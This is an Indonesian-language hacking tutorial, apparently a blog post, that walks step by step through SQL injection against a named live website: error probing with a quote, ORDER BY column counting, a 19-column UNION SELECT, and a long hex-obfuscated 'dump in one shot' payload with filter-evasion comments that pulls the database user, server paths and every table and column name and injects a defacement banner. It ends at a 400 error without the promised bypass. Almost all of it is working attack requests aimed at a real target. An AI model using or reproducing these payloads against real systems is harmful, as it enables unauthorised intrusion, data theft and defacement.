Cara Sql Injection Bypass 400 Bad Request
 |
Assalamu'alaikum Kembali Bersama Gua Haidar Ganss eak
Cara Sql Injection Bypass 400 Bad Request
Site : http://www.ultramaryna.pl/tekst.php?id=342
Bahan?
- Dios
- Kopi
- Rokok
- Doi Kalo Jomblo Gak Usah
Pertama Kita Kasih Tanda Petik Di Belakang
Parameterhttp://www.ultramaryna.pl/tekst.php?id=342'
Dan error berarti vuln
Dan lanjut order by
http://www.ultramaryna.pl/tekst.php?id=342' order by 10--+- no error
http://www.ultramaryna.pl/tekst.php?id=342' order by 11--+- no error
http://www.ultramaryna.pl/tekst.php?id=342' order by 12--+- no error
http://www.ultramaryna.pl/tekst.php?id=342' order by 13--+- no error
http://www.ultramaryna.pl/tekst.php?id=342' order by 20--+- error
Dan di 20 error coba turunin jadi 19 dan ternyata gak error
http://www.ultramaryna.pl/tekst.php?id=342 'order by 19--+- no error
Dan lanjut union select sampai column tadi 19
http://www.ultramaryna.pl/tekst.php?id=-342 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+-
Dan ternyata gak 400 bad request dan keluar angka togel
Dan angka togel nya di angka 2
Dan kita coba masukin dios di angka 2
Dios : concat/****/(0x3C63656E7465723E3C68313E3C666F6E7420636F6C6F723D22726564223E4B49535345442042592046414B4520465249454E44533C2F666F6E743E3C2F68313E3C696D67207372633D2268747470733A2F2F692E6962622E636F2F463739795937352F32303230313131342D3132353335372E706E67222077696474683D22353025223E3C2F63656E7465723E,0x55736572203a3a20,current_user,0x3c62723e,0x56657273696f6e203a3a,version(),0x3c62723e,0x3c623e,0x4461746162617365203a3a,database/*data*//**8**/(),0x3c62723e486f73746e616d65203a3a20,@@hostname,0x3c62723e42617365446972203a3a20,@@basedir,0x3c62723e44617461446972203a3a20,@@datadir,0x3c62723e53736c203a3a20,@@global.have_ssl,0x3c62723e53796d6c696e6b203a3a20,@@global.have_symlink,0x3c62723e,0x4461746520262054696d65203a3a200a,now(),0x3c62723e,@@version,0x3c2f74643e3c2f74723e3c74723e3c74643e486f73746e616d65203a3c2f74643e3c74643e,@@hostname,0x3c2f74643e3c2f74723e3c74723e3c74643e55556944203a3c2f74643e3c74643e,0x54697065202020203a,@@CHARACTER_SET_FILESYSTEM,0x3c62723e,0x3c62723e,0x3c62723e,UUID(),0x3c2f74643e3c2f74723e3c74723e3c74643e546d705f446972203a3c2f74643e3c74643e,@@tmpdir,0x3c2f74643e3c2f74723e3c74723e3c74643e446174615f446972203a3c2f74643e3c74643e,@@datadir,0x3c2f74643e3c2f74723e3c74723e3c74643e426173655f446972203a3c2f74643e3c74643e,@@basedir,0x3c2f74643e3c2f74723e3c74723e3c74643e4c6f675f4572726f72203a3c2f74643e3c74643e,@@log_error,0x3c2f74643e3c2f74723e3c74723e3c74643e536f636b6574203a3c2f74643e3c74643e,@@socket,0x3c2f74643e3c2f74723e3c74723e3c74643e5069645f46696c65203a3c2f74643e3c74643e,@@pid_file,0x3c2f74643e3c2f74723e3c74723e3c74643e4f53203a3c2f74643e3c74643e,@@version_compile_os,0x3c2f74643e3c2f74723e3c74723e3c74643e4f4d203a3c2f74643e3c74643e,@@version_compile_machine,0x3c2f74643e3c2f74723e3c74723e3c74643e53796d4c696e6b203a3c2f74643e3c74643e,@@GLOBAL.have_symlink,0x3c2f74643e3c2f74723e3c74723e3c74643e53534c203a3c2f74643e3c74643e,@@GLOBAL.have_ssl,0x3c2f74643e3c2f74723e3c74723e3c74643e506f7274203a3c2f74643e3c74643e,@@port,0x3c2f74643e3c2f74723e3c74723e3c74643e50726976696c65676573203a3c2f74643e3c74643e,0x3c62723e,(select(@x)/*!50000from/**8**/*/(/*!50000select/**8**/*/(@x:=0x00),(select(0)/*!From/**8**/*/(/*!50000information_schema.columns/**8**/*/)/*!50000where/**8**/*/(table_schema=database/*data*//****/())and(0x00)in(@x:=/*!50000coNcat/**8**/*/(@x,0x3c6c693e,/*!50000table_name/**8**/*/,0x203a3a20,/*!50000column_name/**8**/*/))))x))
http://www.ultramaryna.pl/tekst.php?id=-342 union select 1,concat/****/(0x3C63656E7465723E3C68313E3C666F6E7420636F6C6F723D22726564223E4B49535345442042592046414B4520465249454E44533C2F666F6E743E3C2F68313E3C696D67207372633D2268747470733A2F2F692E6962622E636F2F463739795937352F32303230313131342D3132353335372E706E67222077696474683D22353025223E3C2F63656E7465723E,0x55736572203a3a20,current_user,0x3c62723e,0x56657273696f6e203a3a,version(),0x3c62723e,0x3c623e,0x4461746162617365203a3a,database/*data*//**8**/(),0x3c62723e486f73746e616d65203a3a20,@@hostname,0x3c62723e42617365446972203a3a20,@@basedir,0x3c62723e44617461446972203a3a20,@@datadir,0x3c62723e53736c203a3a20,@@global.have_ssl,0x3c62723e53796d6c696e6b203a3a20,@@global.have_symlink,0x3c62723e,0x4461746520262054696d65203a3a200a,now(),0x3c62723e,@@version,0x3c2f74643e3c2f74723e3c74723e3c74643e486f73746e616d65203a3c2f74643e3c74643e,@@hostname,0x3c2f74643e3c2f74723e3c74723e3c74643e55556944203a3c2f74643e3c74643e,0x54697065202020203a,@@CHARACTER_SET_FILESYSTEM,0x3c62723e,0x3c62723e,0x3c62723e,UUID(),0x3c2f74643e3c2f74723e3c74723e3c74643e546d705f446972203a3c2f74643e3c74643e,@@tmpdir,0x3c2f74643e3c2f74723e3c74723e3c74643e446174615f446972203a3c2f74643e3c74643e,@@datadir,0x3c2f74643e3c2f74723e3c74723e3c74643e426173655f446972203a3c2f74643e3c74643e,@@basedir,0x3c2f74643e3c2f74723e3c74723e3c74643e4c6f675f4572726f72203a3c2f74643e3c74643e,@@log_error,0x3c2f74643e3c2f74723e3c74723e3c74643e536f636b6574203a3c2f74643e3c74643e,@@socket,0x3c2f74643e3c2f74723e3c74723e3c74643e5069645f46696c65203a3c2f74643e3c74643e,@@pid_file,0x3c2f74643e3c2f74723e3c74723e3c74643e4f53203a3c2f74643e3c74643e,@@version_compile_os,0x3c2f74643e3c2f74723e3c74723e3c74643e4f4d203a3c2f74643e3c74643e,@@version_compile_machine,0x3c2f74643e3c2f74723e3c74723e3c74643e53796d4c696e6b203a3c2f74643e3c74643e,@@GLOBAL.have_symlink,0x3c2f74643e3c2f74723e3c74723e3c74643e53534c203a3c2f74643e3c74643e,@@GLOBAL.have_ssl,0x3c2f74643e3c2f74723e3c74723e3c74643e506f7274203a3c2f74643e3c74643e,@@port,0x3c2f74643e3c2f74723e3c74723e3c74643e50726976696c65676573203a3c2f74643e3c74643e,0x3c62723e,(select(@x)/*!50000from/**8**/*/(/*!50000select/**8**/*/(@x:=0x00),(select(0)/*!From/**8**/*/(/*!50000information_schema.columns/**8**/*/)/*!50000where/**8**/*/(table_schema=database/*data*//****/())and(0x00)in(@x:=/*!50000coNcat/**8**/*/(@x,0x3c6c693e,/*!50000table_name/**8**/*/,0x203a3a20,/*!50000column_name/**8**/*/))))x)) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+-
Dan ternyata 400 Bad request;(
